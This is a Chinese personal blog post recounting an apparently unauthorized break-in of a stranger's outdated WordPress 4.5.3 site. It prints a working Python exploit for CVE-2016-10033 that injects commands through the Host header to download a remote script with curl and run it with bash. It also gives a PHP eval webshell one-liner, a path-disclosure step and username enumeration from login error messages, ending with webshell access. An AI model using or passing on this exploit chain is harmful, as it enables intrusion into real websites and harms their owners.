阅读本文大概需要 2.3 分钟

今天，又是忙碌且充实的一天。

下班回到家的我，又在用 FOFA 扫网站，然后便扫到一个日本网友的博客站点。这界面风格，一看就是 Wordpress 了，网站底部也可以看到 Wordpress 的字样。

只有寥寥无几的博文，并且最近一条还是在 3 年前。

image

我浏览器装了 Wappalyzer 插件，插件显示了如下信息。

image

4.5.3 ？这是好久以前的版本了，看来博主确实很久没打理这个网站了。

不过看到这个版本号，我顿时来了精神了。因为我想起 Wordpress <= 4.6 有个经典的任意命令执行漏洞（CVE-2016-10033）。

立马找到我以前写的笔记，一顿翻找，不一会儿就找到了曾经用过的一个 exp。

#!/usr/bin/env python3
import requests
import sys

# wordpress's url
target = 'http://127.0.0.1' if len(sys.argv) < 1 else sys.argv[1]
# Put your command in a website, and use the website's url
# don't contains "http://", must be all lowercase
shell_url = 'example.com/1.txt' if len(sys.argv) < 2 else sys.argv[2]
# an exists user
user = 'admin'

def generate_command(command):
    command = '${run{%s}}' % command
    command = command.replace('/', '${substr{0}{1}{$spool_directory}}')
    command = command.replace(' ', '${substr{10}{1}{$tod_log}}')
    return 'target(any -froot@localhost -be %s null)' % command


session = requests.session()
data = {
    'user_login': user,
    'redirect_to': '',
    'wp-submit': 'Get New Password'
}
session.headers = {
    'Host': generate_command('/usr/bin/curl -o/tmp/rce ' + shell_url),
    'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
}
session.allow_redirects = False
target += '/wp-login.php?action=lostpassword'
session.post(target, data=data)

session.headers['Host'] = generate_command('/bin/bash /tmp/rce')
session.post(target, data=data)

简单讲一下上面的代码。

target 是目标网站，shell_url 则是要执行的命令文件的地址，并且这个地址必须是目标网站所在的机器可以访问到的，user 则是当前网站存在的用户名。

target 目前已知，那么我还需要构造 shell_url，并且需要得到一个有效用户名。

首先来构造 shell_url

创建 1.txt，写入如下的命令，该命令会在指定目录写入一句话木马。

echo '<?php @eval($_POST["cmd"]);?>' > /var/www/html/1.php

上面的命令指定将木马 1.php 写到 /var/www/html/ 下。而我现在要将木马写到网站根目录，但是我并不确定网站根目录是否为 /var/www/html/。

这时想起之前看到 Wordpress 有绝对路径泄露漏洞，访问 /wp-admin/admin-functions.php，显示如下。

image

当前网站根目录确实是在 /var/www/html/。

1.txt 放到本地服务器，再使用内网穿透，将本地服务器映射到公网，使得目标机器可以访问到。

输入公网地址访问测试，成功访问。

image

接下来获取网站用户名

网站域名是 mxxxxblog.com，所以猜测用户名为 mxxxx，进入登录页面进行测试。

image

用户名输入 mxxxxx，密码随便，提示密码错误。

随便输一个用户名。

image

提示用户名不存在。（看不懂日语，翻译的）

至此得到用户名。

修改 exp

将 target、构造的 shell_url 和得到的用户名替换到 exp 中，最终 exp 如下。

image

执行 exp

直接 python 执行，没有任何输出。猜测应该是执行成功了。

直接使用蚁剑连接，成功连接。

image

至此已经拿到 WebShell，不打算再往下了。

结语

其实这次渗透并不算难，基本就是一个 RCE 利用。主要还是目标网站所使用的的系统太老了。

在这里我想对大家说，有些事情其实没你想的那么难。你可以觉得难，但千万不要因为难就不去做，不愿意尝试。

希望大家共勉，加油！